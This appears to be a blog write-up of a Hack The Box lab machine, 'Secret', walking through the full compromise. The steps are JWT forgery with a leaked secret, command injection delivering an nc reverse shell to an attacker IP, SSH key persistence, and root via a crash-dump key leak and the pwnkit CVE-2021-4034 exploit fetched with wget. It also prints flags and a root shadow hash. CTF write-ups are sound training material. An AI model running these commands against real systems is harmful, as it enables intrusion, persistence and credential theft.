Lance Grover

Lance Grover

HTB – Secret – Walkthrough ( with the pwnkit option! LOL )

Posted date:


Figured with pwnkit out I should revisit some of the HTB and see if it can be leveraged to get some easy root…LOL…and with Secret you can! I will discuss the other method I used before pwnkit as well.

First of course I ran nmap -sC -sV 10.10.11.120, and checked out the websites with some enumperation, but I found this api running on port 3000 to play with:

lanix@lgrover-lap-01:~/HTB/Secret$ curl -X POST http://10.10.11.120:3000/api/user/register -H ‘Content-Type: application/json’ -d ‘{“email”:”root@dasiths.works”,”name”:”tester”,”password”:”Kekc8swFgD6zU”}’
{“user”:”tester”}lanix@lgrover-lap-01:~/HTB/Secret$

now we login:

lanix@lgrover-lap-01:~/HTB/Secret$ curl -X POST http://10.10.11.120:3000/api/user/login -H ‘Content-Type: application/json’ -d ‘{“email”:”root@dasiths.works”,”password”:”Kekc8swFgD6zU”}’
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MWY2MmQ5OWNlOGYyMjA0NWNjYzE5MzgiLCJuYW1lIjoidGVzdGVyIiwiZW1haWwiOiJyb290QGRhc2l0aHMud29ya3MiLCJpYXQiOjE2NDM1MjM1MjR9.4_s-m8WD4yR9J8TID2Ydvd4C9Lj1xMGx34R_RAgl6wclanix@lgrover-lap-01:~/HTB/Secret$

now we take that and use https://github.com/ticarpi/jwt_tool

lanix@lgrover-lap-01:~/HTB/Secret$ python3 jwt_tool/jwt_tool.py -I -S hs256 -pc 'name' -pv 'theadmin' -p 'gXr67TtoQL8TShUc8XYsK2HvsBYfyQSFCFZe4MQp7gRpFuMkKjcM72CNQN4fMfbZEKx4i7YiWuNAkmuTcdEriCMm9vPAYkhpwPTiuVwVhvwE' eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MWY2MmQ5OWNlOGYyMjA0NWNjYzE5MzgiLCJuYW1lIjoidGVzdGVyIiwiZW1haWwiOiJyb290QGRhc2l0aHMud29ya3MiLCJpYXQiOjE2NDM1MjM1MjR9.4_s-m8WD4yR9J8TID2Ydvd4C9Lj1xMGx34R_RAgl6wc

        \   \        \         \          \                    \ 
   \__   |   |  \     |\__    __| \__    __|                    |
         |   |   \    |      |          |       \         \     |
         |        \   |      |          |    __  \     __  \    |
  \      |      _     |      |          |   |     |   |     |   |
   |     |     / \    |      |          |   |     |   |     |   |
\        |    /   \   |      |          |\        |\        |   |
 \______/ \__/     \__|   \__|      \__| \______/  \______/ \__|
 Version 2.2.4                \______|             @ticarpi      

Original JWT: 

jwttool_f1454aca7ebd3cf03d089a425ba09757 - Tampered token - HMAC Signing:
[+] eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MWY2MmQ5OWNlOGYyMjA0NWNjYzE5MzgiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6InJvb3RAZGFzaXRocy53b3JrcyIsImlhdCI6MTY0MzUyMzUyNH0.PFHh-JBylEMpQScIUepfDr-81SLrtNBjY6A_z3vdYEg

then we start up our netcat listener

nc -lpnv 1337

Now we exploit to get shell using the token from above

lanix@lgrover-lap-01:~/HTB/Secret$ curl 'http://10.10.11.120:3000/api/logs?file=;rm+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+10.10.14.58+1337+%3E%2Ftmp%2Ff%0A%0A' -H 'auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MWY2MmQ5OWNlOGYyMjA0NWNjYzE5MzgiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6InJvb3RAZGFzaXRocy53b3JrcyIsImlhdCI6MTY0MzUyMzUyNH0.PFHh-JBylEMpQScIUepfDr-81SLrtNBjY6A_z3vdYEg'

now create ourselves an entry in the authorized_keys file (first make sure the ~/.ssh directory exists)

$ echo "ssh-rsa AAAAB3NzaC1yc2EA**************************************************************A0XQ4GZT la@htb" >> authorized_keys

now we can get the user.txt

cat user.txt
cf3762b8cfd19834ad6543a16c297227

then I looked for suid exes, found /opt/count

using /opt/count I had it look at /root/.ssh/id_rsa then in another shell I killed the process
I went to /var/crash and used apport-unpack _path_exe..crash /tmp/somedir then used strings on the CoreDump to see the contents of the id_rsa file, then I could ssh directly in as root…I also used that technique to get the /root/root.txt file but wanted to get shell as well.

Now lets use pwnkit to get root!

I created a .pwnkit directory and pulled down my files from my box, on my local box I did:

git clone https://github.com/berdav/CVE-2021-4034.git
cd CVE-2021-4034
python3 -m http.server 8080

Then on the Secret.htb box I pulled down 3 files:

wget http://10.10.14.58:8080/Makefile
wget http://10.10.14.58:8080/cve-2021-4034.c
wget http://10.10.14.58:8080/pwnkit.c
make
./cve-2021-4034

Now I had a root shell!

dasith@secret:~/.pwnkit$ ./cve-2021-4034 
# id
uid=0(root) gid=0(root) groups=0(root),1000(dasith)
#

cat /root/root.txt
764cfded32d3eca063281c06174ba4ec

Further proof:

cat /etc/shadow

root:$6$/0f5J.S8.u.dA78h$xSyDRhh5Zf18Ha9XNVo5dvPhxnI0i7D/uD8T5FcYgN1FYMQbvkZakMgjgm3bhtS6hgKWBcD/QJqPgQR6cycFj.:18873:0:99999:7:::